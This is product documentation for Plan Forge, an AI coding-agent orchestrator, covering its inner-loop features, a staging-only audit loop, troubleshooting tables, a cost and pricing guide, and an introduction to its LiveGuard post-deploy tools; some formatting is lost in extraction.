pforge-mcp/memory.mjs → writeTrajectory().forge/trajectories/<slice>/<iso>.mdA slice that passes gets captured as a candidate auto-skill with its domain keywords, gate commands, and a SHA prefix. Before the next slice, the orchestrator retrieves matching skills (ranked by reuse count) and injects them into the prompt. A skill promotes to "stable" once its reuse count hits the threshold (default 3).
pforge-mcp/memory.mjs → retrieveAutoSkills() / writeAutoSkill().forge/auto-skills/*.mdDuring plan pre-flight the orchestrator scans every slice. If a slice's title or file list matches a Tempering domain profile (domain / integration / controller) but declares no validation gate, it prints a suggested command using the project's Tempering coverage minimum and runtime budget. Default mode is suggest; set mode: "off" to silence it.
pforge-mcp/orchestrator.mjs → synthesizeGateSuggestions()runtime.gateSynthesis: { mode, domains }After every run, pass or fail, Plan Forge writes a JSON postmortem with retriesPerSlice, gateFlaps, topFailureReason, costDelta, and driftDelta (deltas vs the prior run). Retention is 10 per plan. The Step-2 hardener now reads the newest 3 postmortems and folds their signals into the Scope Contract, closing the loop from execution back into planning.
pforge-mcp/orchestrator.mjs → buildPlanPostmortem() / writePlanPostmortem()maxRunHistory-style defaults.forge/plans/<plan-basename>/postmortem-*.jsonOpt-in. When a cross.* brain recall misses L3 (OpenBrain), the facade fans out to the repos listed in brain.federation.repos[] and reads their .forge/brain/<entity>/<id>.json, read-only, absolute local paths only. URLs and relative paths are rejected by contract.
pforge-mcp/brain.mjs → federationRead()brain.federation: { enabled, repos: [] }, defaults off.. rejected; defense-in-depth path containment checkOpt-in. When enabled, the brain.gate-check responder invokes a speed-quorum reviewer on each slice's diff summary and attaches a verdict to the response (score, critical, summary, durationMs). Advisory-only by default: critical verdicts do not block the next slice unless operators explicitly set blockOnCritical: true. Blocking mode enters Phase-26 after calibration data exists.
pforge-mcp/brain.mjs → invokeReviewer()runtime.reviewer: { enabled, quorumPreset, blockOnCritical, timeoutMs }enabled=false, quorumPreset="speed" (D5), blockOnCritical=false (D6), timeoutMs=30000Everything the Inner Loop exposes lives under two keys in .forge.json, and every key has a toggle in the Dashboard → Config tab.
{
"runtime": {
"gateSynthesis": { "mode": "suggest", "domains": ["domain", "integration", "controller"] },
"reviewer": { "enabled": false, "quorumPreset": "speed", "blockOnCritical": false, "timeoutMs": 30000 }
},
"brain": {
"federation": { "enabled": false, "repos": [] }
}
}
Three more subsystems close the loop further, the slice executor can now race strategies, draft its own patches when a gate fails, and flag token-cost drift without halting a run.
innerLoop.competitive. See The Competitive Loop for the full flow..patch file under .forge/proposed-fixes/. Advisory, nothing auto-applies unless applyWithoutReview: true.ratio (default 2.0) are recorded in .forge/cost-anomalies.jsonl. Detection only; never halts a run.Additional config block (added by the v2.58 best-defaults preset for new installs; existing projects opt in):
{
"innerLoop": {
"competitive": { "enabled": false, "maxParallel": 2, "timeoutSec": 1800 },
"autoFix": { "enabled": true, "applyWithoutReview": false },
"costAnomaly": { "enabled": true, "ratio": 2.0, "medianWindow": 20 }
}
}
All three are surfaced in the Dashboard's new Inner Loop tab alongside the Phase-25 subsystems.
Opt-in worktree races, winner election, auto-fix proposals, and cost-anomaly detection — three opt-in inner-loop subsystems.
.forge/proposed-fixes/ for you to review. It never applies the fix automatically.For the canonical system-wide overview covering Phase-25 and Phase-26 together, see The Self-Deterministic Agent Loop.
When a slice is marked for competitive execution, the orchestrator spawns a worktree per strategy, runs each in isolation, and elects a single winner. Losing worktrees are cleaned up; only the winner's changes enter the working tree.
Election is deterministic. The orchestrator walks the rules in order and stops at the first one that produces a unique winner.
innerLoop.reviewer.enabled is true, the highest reviewer score among remaining strategies wins.When a slice's validation gate fails and the trajectory suggests a small local correction (single file, under a few hundred lines of diff), the orchestrator drafts a patch file instead of retrying blindly.
.forge/proposed-fixes/<fixId>.patch with metadata in .forge/fix-proposals.json.applyFixProposal; the patch is git-apply-style so rollbackFixProposal can undo it cleanly.innerLoop.autoFix.applyWithoutReview: true. This is off by default for a reason, review the patch first.Every slice's total token cost is compared against the rolling per-model median (default window: 20 runs). Ratios above innerLoop.costAnomaly.ratio (default 2.0) are logged to .forge/cost-anomalies.jsonl and surfaced in the Dashboard's Inner Loop tab.
Detection is advisory: anomalies never halt a run. The signal is there so you can investigate why a slice drifted, stale prompts, model degradation, a gate that's suddenly looping, before it shows up as a surprise on the month's bill.
All three subsystems live under a single innerLoop key in .forge.json. New installs receive these defaults via the v2.58 best-defaults preset; existing projects opt in per-subsystem.
{
"innerLoop": {
"competitive": { "enabled": false, "maxParallel": 2, "timeoutSec": 1800 },
"autoFix": { "enabled": true, "applyWithoutReview": false },
"costAnomaly": { "enabled": true, "ratio": 2.0, "medianWindow": 20 }
}
}
Closed-loop bug discovery: content-audit scan → triage → fix, iterating until convergence or max rounds.
off. It never runs automatically unless you explicitly set audit.mode to "auto" or "always" in .forge.json. Production environments are always forbidden.
The audit loop is a first-class Tempering subsystem that discovers bugs from a running system. It probes live routes against a dev or staging server, triages the findings into actionable lanes, and iterates until the finding count converges (no new issues found) or the maximum round limit is reached.
pforge-mcp/tempering/scanners/content-audit.mjs, HTTP-probes a set of routes against a live base URL and emits structured findings: HTTP status, page title, h1, word count, placeholder markers, and client-shell detection for hydrated SPAs.
looksLikeProduction() from ui-playwright.mjs. Refuses to crawl production URLs unless allowProduction: true is explicitly set (and forbidProduction in config is immutably true).pforge-mcp/tempering/triage.mjs, routeFinding(finding, classifier) routes each finding to one of three lanes:
| Lane | Destination | What happens |
|---|---|---|
"bug" | Bug Registry | Finding registered via forge_bug_register |
"spec" | Crucible | Finding submitted as a new smelt (feature gap) |
"classifier" | Local artifact | Proposal written to .forge/audits/ for human review |
Unknown classifier output falls safe to { lane: "bug", confidence: "low" }, findings are never dropped.
pforge-mcp/tempering/drain.mjs, runTemperingDrain(opts) orchestrates the full cycle:
routeFinding()spawnWorker)maxRounds (default 5)Configuration lives in .forge.json#audit:
{
"audit": {
"mode": "off",
"maxRounds": 5,
"autoThresholds": {
"minFilesChanged": 5,
"minDaysSinceLastDrain": 3,
"requireFindings": true
},
"environments": ["dev", "staging"],
"forbidProduction": true
}
}
| Mode | Behavior |
|---|---|
"off" (default) | No automatic drain. Manual only via pforge audit-loop. |
"auto" | Evaluates thresholds after plan completion. Fires only if change-surface signals trip. |
"always" | Dispatches unconditionally after every plan completion. |
# Manual one-shot (ignores config, always runs)
pforge audit-loop
# Respect .forge.json#audit config
pforge audit-loop --auto
# Dry run with custom rounds
pforge audit-loop --dry-run --max=3
# Target staging
pforge audit-loop --env=staging
forge_tempering_drain, programmatic drain loop access. Accepts project, maxRounds, scanners, dryRun, env.forge_triage_route, route a single finding through the classifier. Returns { lane, payload, confidence }.The audit-loop toggle in the dashboard persists to .forge.json#audit, not session-scoped. This matches the pattern used by Forge-Master prefs (.forge/fm-prefs.json) and the quorum advisory toggle.
The discovery harness is the engine that turns a running dev server into a stream of structured findings. It uses a 4-pass build sequence, crawl, wrap, execute, auto-smelt, to close the loop between bug discovery and bug resolution with no human triage required.
A headless Playwright browser crawls every route exposed by the dev server. For each page the harness records HTTP status, document title, h1 text, word count, placeholder markers (e.g. Coming soon, TODO), broken links, and client-shell detection for hydrated SPAs. Results are written as structured JSON to .forge/audits/.
Representative example: a marketing site with 47 routes produces 12 findings on its first pass, three placeholder headings, two broken anchor links, four pages returning non-200 status codes, and three pages with zero meaningful content.
Each finding from Pass 1 is transformed into a Crucible smelt via forge_crucible_submit. The wrapper applies severity triage, routing findings through the three-lane classifier (bug, spec, classifier) before packaging them as structured smelt input with enough context for the hardener to produce actionable plan slices.
The hardened plan runs slice-by-slice through forge_run_plan. Each slice carries its own validation gate and Tempering re-audit. LiveGuard hooks fire between slices, catching regressions before they compound.
Any Tempering failures from Pass 3 are converted into new smelts via forge_tempering_drain and re-entered into the bug registry, no human triage required. The loop iterates until convergence (zero new findings) or the configured maxRounds limit (default 5) is reached.
Every finding from the discovery harness gets sorted into one of three lanes by the wrapper before reaching Crucible. Lane assignment determines whether a human ever sees the finding, what shape the resulting plan slice takes, and how the loop closes. The funnel is the difference between an audit that produces 100 PRs nobody reads and an audit that produces 5 PRs that ship.
Findings with high confidence and a clear remediation pattern (broken links, non-200 status codes, placeholder markers, hydration failures) drop into the bug lane. The wrapper packages them as Crucible smelts with severity attached, then the auto-smelt pass converts them into entries in the bug registry. No human triage required, the loop closes automatically.
Representative example: a 4-pass run finds 8 broken anchor links across the docs. All 8 land in the bug lane as a single batch smelt with severity medium, generate one plan slice that fixes them together, and close themselves out via tempering re-audit.
Findings that imply missing or ambiguous spec content (placeholder headings like "Coming soon," pages with zero meaningful content, hydrated SPAs that crash without JS) drop into the spec lane. These can't be auto-fixed because the harness doesn't know what content should be there, only that something is missing. The wrapper escalates them as Crucible smelts requiring human input before they can be hardened into plan slices.
Representative example: the harness finds a route titled "Pricing, Coming soon" with 12 words of body content. Spec lane escalates this to a human as a Crucible smelt requesting a draft of the actual pricing tier copy. The human responds in the Crucible interview funnel, the wrapper hardens the response into a plan slice, and the loop resumes.
Findings the classifier can't confidently sort (novel signals, contradictory evidence, low confidence scores) drop into the classifier lane. Rather than guess, the wrapper records the finding plus the classifier's confusion signal as a Crucible smelt targeting the classifier itself. Over time, classifier-lane volume should drop as the classifier learns from each handoff.
Representative example: the harness finds a 200 OK route with full content but the document title is just ".", the classifier hasn't seen this signal before. Classifier lane creates a smelt asking the maintainer "should pages with single-character titles be flagged as defective?" The answer becomes a new classifier rule for the next run.
| Finding type | Default lane | Why |
|---|---|---|
| Non-200 HTTP status | Bug | Unambiguous failure, fix is mechanical |
| Broken anchor / link | Bug | Target either exists or it doesn't; trivial to verify |
| Placeholder marker (TODO, Coming soon) | Spec | Implies missing content, not broken content |
| Zero meaningful content | Spec | Page exists but says nothing, needs human authoring |
| Hydration failure (SPA crashes without JS) | Bug | Build / config defect, not a content gap |
| Novel signal / low confidence | Classifier | Classifier can't sort; ask the maintainer |
| Mixed signals (multiple conflicting findings) | Classifier | Pre-empt a wrong auto-smelt by asking first |
For a worked example of how the bug lane closes a real defect end-to-end, including the multi-model quality patterns that catch issues a single model misses, see Quorum Quality Examples in Chapter 14.
.forge/audits/ as JSON artifacts. GitHub PR creation is a deferred enhancement.spawnWorker is injectable: Consistent with visual-diff quorum and bug classifier patterns. Already in the function signature.forbidProduction: true cannot be overridden via config, it's hardcoded in auto-activate.mjs.
"Something's wrong." Find the answer fast.
Every tool breaks eventually. The question is whether you have a diagnostic path or just a prayer. Start with pforge smith, it catches 80% of issues in 5 seconds.
| Tool | What It Checks | When to Use |
|---|---|---|
pforge smith | Environment, VS Code config, setup health, version | First thing when anything seems off |
pforge check | Setup file existence and validity | After setup or update |
forge_diagnose({ file }) (MCP tool) | Multi-model bug investigation on a specific file | When a slice fails and you can't see why, invoke from Copilot Chat |
pforge smith looks likeIf you've never run it, here's the shape of the output to compare against. Anything red or marked FAIL is a real problem; WARN usually means an optional extension or integration isn't installed.
$ pforge smith
Plan Forge v3.12.0, forge diagnostic
Environment
OS Windows 10.0.22631 OK
Shell PowerShell 7.4.1 OK
Node v20.11.0 OK (≥ 20 required)
Git 2.42.0 OK (≥ 2.30 required)
Forge layout
.github/prompts 22 files OK
.github/instructions 22 files OK
.github/agents 14 files OK
.github/hooks 7 files OK
.github/skills 12 files OK
docs/plans 5 files OK
.forge/config.json present OK
MCP server
pforge-mcp/server.mjs present OK
Port 3100 free OK
Port 3101 (WS hub) free OK
Agent adapters
copilot .vscode/mcp.json OK
claude .mcp.json not installed WARN (run setup with --agent claude)
cursor .cursor/mcp.json not installed WARN
codex .codex/mcp.json not installed WARN
Result: 15 OK, 3 WARN, 0 FAIL , forge is healthy
Result: line is the headline. If FAIL = 0 you're fine to keep working. WARNs are reminders, not blockers.
| Symptom | Cause | Fix |
|---|---|---|
| AI ignores coding standards | Instruction files not loading | Check applyTo pattern matches the file you're editing. Run pforge smith to verify file counts. |
| Wrong instructions loading | applyTo glob too broad | Narrow the pattern, use **/auth/** instead of ** |
| Guardrails load but AI ignores them | Context budget exceeded | Reduce copilot-instructions.md to <80 lines. Remove applyTo: '**' from non-essential files. |
| Project Principles not enforced | PROJECT-PRINCIPLES.md missing | Run the project-principles prompt. The instruction file activates only when this file exists. |
| Symptom | Cause | Fix |
|---|---|---|
| Gate fails with build errors | Code doesn't compile | Fix the build error, then pforge run-plan --resume-from N |
| Gate fails, tests regress | New code broke existing tests | Fix the regression. Check if scope contract is too broad. |
| Slice times out | Context window exhausted or model overloaded | Split the slice into smaller chunks. Try a different --model. |
| Model returns error | API key invalid or rate limited | Check XAI_API_KEY / OPENAI_API_KEY env vars. Wait for rate limit reset. |
| Scope violation detected | AI touched forbidden files | The PreToolUse hook should catch this. If not, tighten the Scope Contract. |
| Escalation exhausted | All models in chain failed | Review the slice, it may be too complex. Break into sub-slices or simplify gates. |
| Symptom | Cause | Fix |
|---|---|---|
| Connection refused on :3100 | Server not running | node pforge-mcp/server.mjs |
| Port already in use | Another process on 3100 | node pforge-mcp/server.mjs --port 4100 or kill the conflicting process |
| Blank page loads | Missing node_modules | cd pforge-mcp && npm install |
| WebSocket disconnects | Firewall or proxy blocking :3101 | Allow port 3101, or set WS_PORT env var |
| No data in Runs/Cost tabs | No execution history yet | Run a plan first: pforge run-plan |
| Symptom | Cause | Fix |
|---|---|---|
| "Preset not found" | Typo in preset name | Valid presets: dotnet, typescript, python, java, go, swift, rust, php, azure-iac |
| Permission denied | Read-only directory or no git access | Check file permissions. Run from a writable directory. |
| Existing files conflict | Previous setup exists | Use -Force flag to overwrite, or pforge update for selective updates |
| Wrong files installed | Incorrect preset for your stack | Re-run: .\setup.ps1 -Preset <correct-preset> -Force |
| Strategy | Savings | How |
|---|---|---|
| Use cheaper execution model | 50–70% | Set modelRouting.execute to a smaller model |
| Reserve expensive model for review | 30–50% | modelRouting.review: "claude-opus-4.6" |
| Raise quorum threshold | 20–40% | --quorum-threshold 8 (fewer slices trigger consensus, see scoring rubric) |
| Reduce context per slice | 10–20% | Use targeted Context: lists (see Chapter 4) |
| Preview before running | N/A | pforge run-plan --estimate or forge_estimate_quorum (compares all four modes) |
xAI Grok Aurora returns JPEG bytes regardless of requested format. If raw bytes with wrong MIME type enter the conversation history, the session becomes unrecoverable.
generateImage() function detects actual format via magic bytes and converts using sharp. Sessions should be safe, but if you encounter the MIME mismatch error, start a fresh session.
Safe workflow: Use .jpg extensions (matches Grok's native output), generate art in dedicated sessions, or use the REST API: POST /api/image/generate.
| Error | Cause | Fix |
|---|---|---|
No .forge.json found | Not in a Plan Forge project | Run pforge init or setup.ps1 |
templateVersion mismatch | Framework files outdated | pforge update |
No API key configured | Missing env var for image/analysis | Set XAI_API_KEY or OPENAI_API_KEY |
Plan parsing failed | Malformed plan file | Check for missing ## Execution Slices section or broken markdown |
Gate command failed (exit 1) | Build or test failure | Fix the code, then --resume-from N |
DRIFT DETECTED | Forbidden file modified | Revert the forbidden change, re-run the slice |
CRITICAL_FIELDS_MISSING v2.82.1 | Crucible finalize blocked, missing build-command, test-command, scope, gates, forbidden-actions, or rollback | Call forge_crucible_preview for criticalGaps[], then continue the interview |
PLAN_ALREADY_EXISTS v2.82.1 | Crucible finalize refuses to overwrite hand-authored docs/plans/Phase-NN.md | Read both files (existing plan + .crucible-draft.md), then re-finalize with overwrite: true if you really mean it |
ASK_QUESTION_MISMATCH v2.82.1 | Client passed a stale questionId to forge_crucible_ask | Re-fetch state via forge_crucible_preview, retry with the current question id |
QUORUM_ALL_FAILED v2.78 | All quorum models timed out (60s each) or errored | Check API keys / network; retry. Consider --quorum=speed if flagship models are unavailable. Multi-agent quorum reference. |
NO_REASONING_MODEL | Forge-Master has no model configured and no API key found | gh auth login for zero-key path, or set ANTHROPIC_API_KEY / OPENAI_API_KEY / XAI_API_KEY, or set forgeMaster.reasoningModel |
Subprocess STATUS_CONTROL_C_EXIT (0xC000013A) v2.81 | Worker process was killed by signal mid-slice | Slice is now correctly marked failed (not silently passed). Check statusReason, then --resume-from N |
slice-orphan-warning event v2.82.1 | Failed slice's worker deliverables were staged but not committed | See .forge/runs/<runId>/orphans-slice-<N>.json for copy-paste recovery commands |
The Crucible critical-fields gate refuses to draft TBD-laden plans. If finalize keeps returning CRITICAL_FIELDS_MISSING, the recovery path is:
forge_crucible_preview { id }, returns criticalGaps: [{ field, reason, hint }, …]forge_crucible_ask queues a question that targets that fieldinferRepoCommands, usually you just confirmIf the gate is blocking on something you genuinely don't need (rare, the gate exists for good reason), the escape hatch is --manual-import on a hand-authored plan. See Chapter 5 — Enforcement Gate.
Forge-Master classifies prompts into operational, troubleshoot, build, advisory, or offtopic. Misroutes happen most often when:
via field in the response. If "keyword", try a more keyword-rich phrasing ("status of …", "why did … fail", "should we …")GET /api/forge-master/cache-statsgrok-3-mini is fine for most prompts but quirky vocabulary may need grok-4 or gpt-4o-mini. Override via forgeMaster.routerModel in .forge.json"auto", requires lane=advisory + autoEscalated=true + fromTier=high + confidence≥medium. Use "always" to remove gating during testingSee Forge-Master chapter — Troubleshooting for the full list.
Host-aware routing detects which IDE / CLI host you're running Plan Forge from (VS Code + Copilot, Claude Code, Cursor, Windsurf, Zed, bare terminal) so you don't silently double-pay against your non-Copilot subscription when calling gpt-* models. If you're seeing surprising routing behavior:
| Symptom | What's happening | Override |
|---|---|---|
"My gpt-* calls cost more on Claude Code than VS Code" | Default auto mode prefers direct OpenAI API on non-Copilot hosts (honors your subscription) | Set routing.hostPreference: "gh-copilot" in .forge.json to force Copilot subscription billing |
"Quorum dropped gpt-* from the run" | You're on a non-Copilot host AND OPENAI_API_KEY is unset AND routing.hostPreference is "drop" | Set the API key, or change preference to "auto" / "gh-copilot" |
| "Quorum pre-run summary table shows different billing per model" | Working as intended, the new table shows host + per-model billing surface so you can see spend distribution before dispatch | None, this is a feature, not a bug |
If a script needs to react to a Plan Forge failure programmatically, branch on the exit code (CLI / orchestrator) or the named error code (MCP tools / REST). These are stable across releases, new failure modes get new codes rather than reusing existing ones.
| Layer | Returns | Branch on |
|---|---|---|
pforge CLI | POSIX exit code | 0 success · 1 generic failure · 2 environment refusal (not in git repo, update-check failed, audit had no scanners) |
pforge run-plan | Exit code + statusReason in JSON | 0=completed / completed-with-warnings · 1=failed / aborted. statusReason narrows it: gate-failed, drift-detected, quorum-all-failed, etc. |
MCP tools (forge_*) | { ok, code, error } envelope | ok: false with a named code, e.g. NO_API_KEY, CRITICAL_FIELDS_MISSING, QUORUM_ALL_FAILED, PLAN_NOT_FOUND |
REST (POST /api/…) | HTTP status + JSON body | 400 bad body · 404 missing · 409 state conflict (ERR_UPDATE_DURING_RUN) · 429 rate limited (use retryAfterMs) · 500 internal |
| OS subprocess (worker, gate) | Native exit code, surfaced via statusReason | 0xC000013A Windows Ctrl+C · 130/137/143 POSIX signals. Mapped to worker-signaled. |
📄 Full reference: FAQ, Multi-Agent Setup — GitHub Copilot
How Plan Forge prices LLM calls, where token costs come from, the three sources of truth, per-quorum-mode economics, cost-effective workflow patterns, and the anti-lock-in commitments that keep your provider bill yours, never marked up, never proxied, never withheld.
forge_estimate_quorum for projections and forge_cost_report for actuals. If you're a UI building a quorum picker, populate it from forge_estimate_quorum, do not invent dollar amounts.
Plan Forge has no Plan Forge bill. It has your provider bill, plus the orchestrator's bookkeeping to tell you what fraction of that bill belongs to which slice, which plan, and which model. Three things follow from that:
forge_cost_report are the numbers on your provider invoice.Cost numbers in Plan Forge come from exactly three places. Knowing which is which prevents the common confusion between "what a slice will cost" and "what it did cost."
| Source | Answers | How to read it |
|---|---|---|
MODEL_PRICING tablepforge-mcp/cost-service.mjs | "What does a given model charge per million input / output / cache tokens?" | Static table, updated when providers publish new prices. Each entry cites its _source URL with date. Cache, flex, priority, and AOAI deployment multipliers are encoded alongside the base rates. |
forge_estimate_quorum · forge_estimate_slice | "What will this plan / slice cost before I run it?" | Token-aware projections. Walks each slice, projects worker tokens by file size + scope, projects quorum panel by mode. Returns four-mode breakdown (auto / power / speed / disabled) for plans. |
forge_cost_report | "What did Plan Forge actually charge to my providers?" | Aggregates .forge/cost-history.json, one record per LLM call with run id, slice, role, model, tokens, ticks (xAI exact-cost), and dollar amount. Roll up by day / month / model / role. |
The variables that move your bill, ranked roughly by how much leverage they have.
| Driver | Range | How to manage it |
|---|---|---|
| Model tier | ~50× spread between flagship and nano (claude-opus-4.7 $5/$25 vs gpt-5-nano $0.05/$0.40 per 1M tokens) | Use cheaper models for code-search / classification / routing. Reserve flagships for hard reasoning slices. The auto quorum mode does this automatically. |
| Token volume per slice | 1K (small CRUD) to 200K (large refactor with broad context) | Tighten scope contracts. A slice that touches 4 files costs ~10× less than one that touches 40, even with the same logic. Split fat slices. |
| Quorum panel size | 1 model (disabled) to 5+ models (power mode) | Use auto by default; opt into power only for high-stakes or low-confidence decisions. See per-quorum-mode economics. |
| Cache reuse | 1.0× (no cache) down to 0.10× (Anthropic / OpenAI cache read) | Plan Forge prompts the same system blocks across slices in a run, which providers cache. No action needed, just don't restart the run between slices unnecessarily. |
| Reasoning tokens (o-series, GPT-5 reasoning) | Often 5–20× visible output | Reasoning tokens are billed at the output rate and already counted in output_tokens, don't double-count when estimating. Use reasoning models only when the slice needs them. |
| Retries & escalation | 1× (clean pass) to 3–5× (full escalation chain) | Tighten validation gates so first-pass success rate climbs. The Inner Loop's reviewer calibration is designed for this, see Chapter 14 deep dive — The Inner Loop. |
| AOAI deployment type | 1.0× (global / provisioned) to 1.1× (data-zone / regional) | Use global Azure OpenAI deployments unless data-residency requires otherwise. The 10% uplift is encoded in aoai_deployment_type_multiplier. |
| Priority / flex tier (GPT-5.x) | 0.5× (flex) to 2.0× input / 1.5× output (priority) | Flex is fine for batch / offline runs; priority is rarely worth it for plan execution. Default tier is standard. |
Before running a plan, get a projection. After running, audit the actual.
forge_estimate_quorum// MCP
forge_estimate_quorum({ plan: "docs/plans/Phase-NN.md" })
// REST
POST /api/tool/forge_estimate_quorum
{ "plan": "docs/plans/Phase-NN.md" }
// CLI
pforge run-plan --estimate docs/plans/Phase-NN.md
Returns a per-slice token projection plus four-mode totals:
{
"plan": "Phase-NN",
"slices": [
{ "n": 1, "name": "Add user_profiles table", "projectedTokens": 8400, "modelTier": "mid", … },
…
],
"modes": {
"auto": { "totalUsd": 0.42, "breakdown": { /* per-model */ } },
"power": { "totalUsd": 1.85, "breakdown": { /* per-model */ } },
"speed": { "totalUsd": 0.18, "breakdown": { /* per-model */ } },
"disabled": { "totalUsd": 0.09, "breakdown": { /* per-model */ } }
}
}
The picker UI in the dashboard uses exactly this payload. If you're building your own UI, populate it the same way, the four-mode table is the single source of truth for "what does this cost?"
forge_cost_report// MCP
forge_cost_report({ runId: "run-2026-05-18-091234" }) // one run
forge_cost_report({ scope: "month" }) // current month
forge_cost_report({ scope: "month", groupBy: "model" }) // monthly by model
// REST
GET /api/cost/report?runId=…
GET /api/cost/report?scope=month&groupBy=model
Returns the actual provider-billable amounts pulled from .forge/cost-history.json. Group by model, role, day, or slice. For runs that included xAI calls, the dollar amounts use the provider's exact-cost ticks (1 tick = $1×10-10) rather than multiplier math, what you see is what xAI billed.
Quorum mode is the biggest single cost lever after model tier. Plan Forge ships four modes:
| Mode | Panel | Threshold | Cost shape | When |
|---|---|---|---|---|
auto (default) | Dynamic: 2–3 models picked by intent class | Majority of responders | ~3× single-model | Most plans. Cost-effective and adequate for most decisions. |
power | 4–5 flagship models (Opus, GPT-5.5, Gemini Pro, Grok 4.x) | 5 | ~8–12× single-model | Architectural decisions, plan hardening (Session 1), high-stakes refactors. |
speed | 4–7 fast / cheap models (mini / nano tier) | 7 | ~1.5–3× single-model | High-volume CI runs, batch classifications, when latency > depth. |
disabled (--no-quorum) | 1 model | n/a | 1× (baseline) | Solo dev, trivial slices, dev-loop iteration. |
forge_estimate_quorum, never from chat math. The ratios above are approximate and shift with model availability; the tool always returns current numbers.
Patterns that have been observed to reduce spend without hurting outcomes.
A slice that costs $0.50 to succeed is dramatically cheaper than one that costs $3 to fail and $2 to retry. The smaller the slice, the higher the first-pass success rate, the lower the total cost. The Crucible's plan-hardening pass (Session 1) is designed to split slices that are too fat, trust it. Target: 1–4 files per slice, 1 conceptual change per slice.
The auto mode classifies each slice into "search-like" / "transform-like" / "reason-like" and routes to a model tier accordingly. Hardcoding a flagship via --model often costs 10× more for no measurable quality gain on routine slices.
Loose gates pass bad work; bad work triggers retries; retries cost money. Strict, fast-to-execute gates (the Inner Loop, reviewer calibration target ~90–95% precision) catch failures on the first attempt and avoid the retry tax. The Inner Loop's forge_validate and forge_sweep are designed for exactly this trade.
Provider caches give 10× savings on cached input. Plan Forge structures prompts so the system block, scope contract, and slice instructions are stable across slices in a run, providers cache the prefix automatically. Restarting the orchestrator between slices throws this away. Run plans end-to-end when you can.
power mode at the wrong moment is the most common over-spend. Reserve it for: plan hardening (Session 1), architectural decisions, slices flagged with high blast radius. Routine execution, even of moderately complex slices, works fine on auto or disabled.
Plan Forge's economic story is your bill stays yours. Concretely:
| Commitment | What it means |
|---|---|
| BYOK across providers | Anthropic, OpenAI, Google, xAI, Azure OpenAI, same code path, your keys. Switch providers by changing env vars; no migration tool needed. |
| No proxy layer | The orchestrator calls the provider's public API directly. There is no Plan Forge endpoint in the data path. Outage isolation: Plan Forge can't take you down, only your provider can. |
| No usage telemetry | Plan Forge does not phone home with your token counts. The cost history lives in .forge/cost-history.json on your machine and stays there unless you explicitly export it. |
| Symmetric provider treatment | Adding a new provider takes ~30 lines in pforge-mcp/cost-service.mjs + a route adapter. No provider is privileged; the pricing table is open-source. |
| Open-source pricing table | MODEL_PRICING is in the repo with _source URLs. If you don't believe a rate, click the source. If a rate is wrong, file a PR. |
| Easy export | forge_cost_report exports JSON or CSV. Your run history is portable to any BI tool. No data lock-in. |
| Skill / plan files are portable | SKILL.md and plan markdown are vendor-neutral text. Moving to a different agent runtime (Claude Code, Cursor, raw API scripts) preserves your investment. |
For teams or CI use, forge_cost_report aggregates roll up cleanly. Group by the dimension you want to forecast against and feed the result into your spreadsheet, BI tool, or dashboard of choice:
# Monthly spend by model
GET /api/cost/report?scope=month&groupBy=model
# Per-run breakdown (granular: every LLM call)
GET /api/cost/report?runId=run-2026-05-18-091234
# Last-30-day rollup by role (worker vs reviewer vs quorum vs forge-master)
GET /api/cost/report?scope=month&groupBy=role
Records come straight out of .forge/cost-history.json, one row per LLM call, with run id, slice, role, model, token counts, and dollar amount (or xAI ticks). The file is plain JSONL; you can pipe it through jq, import to DuckDB, or load to a spreadsheet without going through the API. Plan Forge does not enforce budgets, send alerts, or phone provider invoices, the data is yours; the policy is yours.
From the recent v3.6.2 manual-completion phase, slice B5 ship REST API reference appendix:
| Item | Value |
|---|---|
| Mode | auto quorum, 3 models on hardening, 1 model on execution |
| Files touched | 10 (1 new, 9 modified) |
| Worker input tokens | ~42,000 (system + scope + 9 referenced files at ~3K each) |
| Worker output tokens | ~6,400 (mostly the new rest-api-reference.html) |
| Cache hit on system block | Yes (Anthropic, 0.10× on ~3,200 cached tokens) |
| Validation passes | 2 (one failed on broken cross-refs, ~5K extra worker tokens to fix) |
| Total provider spend | ~$0.78 |
Equivalent power mode estimate | ~$6.20 (8× multiplier) |
Equivalent disabled estimate | ~$0.26 (single model, but expected reduction in reviewer-catch rate raised retry risk; auto was the right pick) |
The lesson: auto mode with right-sized slices and tight gates kept a 600-line appendix delivery under a dollar. The estimator predicted $0.71; actual was $0.78, a 10% miss attributable to the second validation pass, which the estimator does not yet model.
.forge.json modelRouting, default model selection that drives per-slice cost..forge.json quorum, threshold and mode that govern panel size.
The forge builds your software. LiveGuard watches the gates after it ships.
Plan Forge sessions end when the code ships. The forge hardens your plan, executes your slices, and pushes a clean commit. Then it stops, because that's the right boundary for a build-time tool.
But software doesn't stop when the build does. Secrets drift into environment variables. Dependencies acquire CVEs. Configuration diverges between environments. The regression gate you wrote last month no longer covers the new payment flow. None of these are build-time failures, they're post-coding failures. And without a watch on the gates, they grow silently until they become incidents.
LiveGuard is what watches after the forge stops.
LiveGuard doesn't just observe, it learns. Every finding feeds back into the system:
forge_hotspot) are tested first by the regression guard. Risk-based testing, test the code most likely to break..forge/health-dna.json for cross-session decay detection.LiveGuard occupies the operational phase, after code is shipped but before (and alongside) production APM:
The forge pipeline (Chapters 1–14) covers everything left of the arrow. LiveGuard picks up at the right.
LiveGuard is not an APM (Application Performance Monitoring) system. It doesn't instrument your production runtime, collect request traces, or measure p99 latency. Tools like Datadog, New Relic, and Application Insights already do that well.
LiveGuard operates at the project level, not the request level. It watches your codebase, your environment files, your dependency tree, and your deployment history, the things that change between builds, not between HTTP requests. Think of it as a quality gate that stays active between coding sessions.
In the forge metaphor, the build pipeline is the smith, it shapes raw material into a finished product. LiveGuard is the guardian posted at the gate after the smith finishes. The guardian doesn't shape the metal; it watches for cracks, drift, and intrusions that appear over time.
Each LiveGuard tool is a different kind of watch:
forge_drift_report)forge_incident_capture)forge_dep_watch)forge_regression_guard)forge_hotspot)forge_secret_scan)forge_env_diff)LiveGuard tools are designed for three trigger points:
| When | Tools to Run | Why |
|---|---|---|
| After every plan execution | forge_drift_report, forge_regression_guard | Catch architecture drift while context is fresh |
| Before a deploy | forge_secret_scan, forge_env_diff, forge_dep_watch | Block secrets, missing env keys, and new CVEs from reaching production |
| On a schedule (daily / weekly) | forge_health_trend, forge_alert_triage, forge_hotspot | Trend analysis and prioritized alert review |
| After an incident | forge_incident_capture, forge_runbook | Record the incident and generate a response runbook |
In v2.29, lifecycle hooks automate this, PreDeploy runs secret scan and env diff automatically before any deploy command, and PostSlice runs drift analysis after every commit.
14 post-coding intelligence tools. Each guards a different gate.
All 14 LiveGuard tools are available as MCP tools and via REST API. Full reference per tool below.
| Tool | What It Guards | Since |
|---|---|---|
| forge_drift_report | Architecture drift vs. plan | v2.27 |
